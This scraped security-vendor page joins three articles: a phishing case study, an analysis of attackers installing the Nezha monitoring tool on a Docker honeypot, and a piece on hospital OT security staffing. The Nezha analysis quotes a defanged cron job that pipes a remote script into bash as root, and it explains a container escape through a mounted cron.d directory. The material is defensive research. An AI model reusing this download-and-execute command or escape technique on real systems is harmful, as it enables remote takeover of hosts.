Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dan Fein
VP, Product
Share
23
Jul 2020
Type of attack: Payload delivery; Impersonation
Organization: Charity, US
Time and date: 2020-06-11 07:05 UTC
Mailboxes: <5000
Cyber-criminals often profit from a climate of uncertainty and fear, as it can make people act in haste and ignore warning signs. COVID-19 has created an environment perfect for scammers looking to exploit human error. Spoofing IT departments’ emails is a popular method of social engineering in email attacks. It relies on employees’ tendency to follow orders from authority figures with little or no hesitation. This is further compounded by the increase in work from home and greater reliance on remote interaction with IT support.
Figure 1: A snapshot of Antigena Email’s user interface
Sender information
The attacker had disguised the address field to resemble the organization’s IT department.
Apparent motive
The emails contained a link which Darktrace’s AI identified as an 100% rare domain, indicating no devices across the organization had ever previously accessed it. The links also contained the recipients’ email addresses, suggesting that it led to a fake login page intending to trick an employee into inputting sensitive data.
Figure 2: The anomalous link in question
Antigena Email’s actions
Delivery action: Hold message
Antigena Email took its strongest action on this incoming email campaign, preventing the emails from reaching any recipients.
Why did this attack bypass other email security solutions?
Spoofing involves fixing some visual aspect of the email headers. Attackers use this technique to make an email appear as if it came from someone recognizable, such as an IT department or company executive. In this case it was enough to fool the existing security solutions, and could have fooled a recipient into clicking the link and entering their credentials had Antigena Email not been installed.
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
How Attackers Abuse the Chinese Nezha Monitoring Tool
What is Nezha?
Nezha is an open-source tool that allows system administrators to centrally monitor multiple servers, including their resource usage such as CPU and network usage, and uptime. The tool also enables remote administrative access via an interactive shell.
The project has just under 10,000 stars on GitHub and has seen widespread adoption in the Chinese IT community, with many forum posts providing guides on installation and usage.
However, Nezha’s status as a legitimate executable that has remote access capabilities creates an opportunity for misuse. Instead of deploying a regular command-and-control (C2) implant, attackers can deploy Nezha directly on compromised hosts. As these deployments are functionally indistinguishable from legitimate installations, they can blend into expected operational tooling and evade detection.
Darktrace’s analysis of a Nezha infection
Darktrace operates several high-interaction honeypots to observe attacker techniques and behaviors. Darktrace analysts observed an intrusion against the Docker-based honeypot, initiated with a malicious container create command.
Figure 1: The malicious container create command.
Docker allows any host file or directory to be passed through to a container, granting read and write access. In this case, the attacker made use of this to pass through the cron.d directory, which is used to schedule recurring tasks, such as maintenance or backup commands.
These commands and timings are stored in the cron.d directory, which the attacker can now write to because it is passed through to their malicious container. By writing a job to this directory from within the container, the cron service running on the host detects the new job and executes it on the host, effectively allowing the attacker to escape the container.
The attacker the created a malicious cron job named ngk: * * * * * root curl hxxps://file.gpu5[.]com/linux_install.sh | bash
This resulted in the host downloading and running the linux_install.sh file with root privileges.
The linux_install script installs several dependencies, sets up environmental variables, and retrieves a second-stage script (nezha_install.sh) from the same domain.
Figure 2: The linux_install script.
The nezha_install.sh script based on the official Nezha installer but has been modified to hard code configuration values, such as the server address, and to remove interactive prompts, allowing it to be installed without user input.
Open by design
One of Nezha’s most interesting design choices is that its main monitoring panel does not require authentication to view a list of monitored hosts. This exposes a list of compromised systems via the attacker-controlled panel, enabling direct observation of the operation’s scale, victimology and infrastructure.
Figure 3: The attacker’s Nezha dashboard.
At the time of analysis, the campaign had infected 141 servers, with 45 still online and accessible. The number of online servers was previously higher, suggesting that some victims may have discovered and removed the infection.
The exposed dashboard provides insights into victim characteristics, including geographic distribution, hardware specification, and resource usage. Most infected hosts were low-spec systems, commonly one or two core Xeon CPUs and less than 4GB of RAM, indicating they were likely small virtual private servers (VPS) with limited value to the attacker.
Many systems also exhibited 100% CPU usage, which may indicate concurrent compromise, such as cryptocurrency mining activity by other threat actors.
Open-source intelligence platforms such as Shodan and Censys can also identify publicly exposed instances of Nezha. Although authentication is required to execute commands on a monitored server, visibility into dashboards still provides valuable intelligence for attackers and defenders alike.
At the time of writing, Darktrace identified 33 internet-facing Nezha installations as openly accessible.
Key takeaways
The abuse of legitimate software has become a consistent feature of modern intrusion activity, enabling attackers to operate without deploying traditional malware and reducing the risk of detection.
This creates a form of “trust inversion”, where tools typically associated with routine operations may instead indicate malicious activity when deployed outside expected contexts. Organizations should therefore prioritize asset visibility and software governance, ensuring that unexpected tool deployments can be identified and investigated, rather than focusing solely on malware-centric detection.
This challenge is especially pronounced in cloud environments, where legitimate monitoring tools may represent either essential software or an attacker backdoor. The scale and dynamic nature of cloud environments further complicate distinguishing between benign and malicious use.
Credit to Nathaniel Bill (Malware Research Engineer) Edited by Ryan Traill (Content Manager)
Healthcare’s OT Cybersecurity Gap: Why Hospitals Must Make the Same Security Investments as Regulated Critical Infrastructures
Rethinking the healthcare attack surface
When most people think about Operational Technology (OT) cybersecurity, they think about oil & gas pipelines, utilities, manufacturing plants, or power grids. However, hospitals & healthcare systems have quickly become a point of focus in the OT cybersecurity community as they do employ a variety of OT in the form of IoMT (Internet of Medical Things) networked devices such as: infusion pumps, imaging systems, patient monitoring equipment, laboratory systems, and traditional industrial control systems (ICS) in the form of smart building management systems (BMS) and even on site power generation control systems.
These healthcare environments are no longer just traditional IT ecosystems, they are cyber-physical environments where disruption can directly impact patient care, operational continuity, and ultimately patient safety.
The OT cybersecurity expertise gap in healthcare organizations
Our research in the OT cybersecurity space revealed a concerning trend. Many hospitals and healthcare networks lack dedicated OT cybersecurity teams, OT security full time employees (FTE) and even OT expertise in the form of OT security certifications when compared to other critical infrastructure sectors.
On the other hand, within industries such as energy and manufacturing, we encounter more mature OT security programs that employ full time employees dedicated to OT cybersecurity with OT security certifications and expertise to secure industrial and operational environments and lead investment in OT security processes and technology.
When reviewing the top 20 U.S. Hospitals by market cap, given what is publicly available on LinkedIn, only one FTE with an OT cybersecurity certification was found. The certifications that were searched for include: GIAC GICSP, GIAC GRID, GIAC GCIP and all ISA/IEC 62443 certifications. When replicating this same search across the top 20 utility providers in the US, 73 FTEs with OT related certifications were identified. As a control group, we looked within financial services, an industry NOT expected to have OT systems worth investing in FTEs to protect. However, the top 20 US financial institutions had 18 FTEs with OT related certifications.
What these findings reveal
Overall, the findings regarding healthcare investment in OT security FTEs are surprising given how operationally dependent modern healthcare has become on OT. So why aren't hospitals investing in OT security personnel at the rate of peer critical infrastructures? It could just be lack of awareness; however, there are other, more plausible reasons.
Based on historical trends in cyber incidents within the healthcare space, one could speculate that there is significantly greater likelihood of being victim to an attack that focuses on extortion or data theft rather than an attack on specific OT systems. The amount of ransomware events incurred in healthcare, that historically do not target OT systems, may divert attention and security investment to the parts of the attack surface most likely to be targeted by ransomware. Additionally, data theft is a relevant threat objective for hospitals given PHI, PCI and PII, and data theft does not traditionally align with attacks targeting OT.
However, with focused investment to address data theft and with adversaries new capability to string together chains of vulnerabilities of different severity scores using advancements in AI, we could be entering a threat landscape where adversaries pivot their tactics to target exposed and under protected devices and systems like OT. For example, although not a patient records database, predominant IOMT protocols HL7 and DICOM are unencrypted plaintext protocols and unless encrypted it is very simple for adversaries, who are sniffing traffic, to identify protected health information (PHI) in these communication protocols.
Why OT cybersecurity expertise can be effective for healthcare organizations
The convergence of IT, OT, and IoMT is already here, and threat actors are increasingly aware of the operational vulnerabilities that come with it. Additionally, as AI solutions such as agentic or generative applications are adopted and deployed, the attack surface will continue to change as permissions, and new connections will exist to support AI efficiency. From a cybersecurity standpoint, the reality is that many healthcare organizations are still working to establish consistent visibility and governance across their enterprise-connected devices and systems as their attack surface is changing in real time. As the healthcare sector remains a significant target for cyber-attacks, hospitals would be well advised to begin addressing their operational environments OT as a critical component of their attack surface and invest in securing them first with people, then process and technology.
What can healthcare organizations do to secure their OT
Including OT in current cybersecurity processes such as red teaming and testing incident response plans that take OT into account alongside building dedicated OT security capabilities including improving OT network visibility, leveraging OT network anomaly detection, micro-segmentation, and secure remote access will become essential steps in strengthening healthcare resilience.
However, before any of the above processes or investments in technology can be made, these healthcare organizations, like the other critical infrastructure sectors, need to invest in the people with the experience in OT security to lead, implement, manage and audit the investment in OT cybersecurity technology and processes. In cases where headcount cannot be added, investment in OT security certifications, such as the ones listed in this article, and participation on OT security events focused on practitioner training for existing cybersecurity employees can move the needle in terms of bringing OT expertise to the existing team.
In an industry where uptime and safety are as mission critical as they are for a power utility, OT cybersecurity FTEs can no longer be viewed as optional for healthcare organizations and must become part of the foundation of modern healthcare cybersecurity strategy.
%201.png)
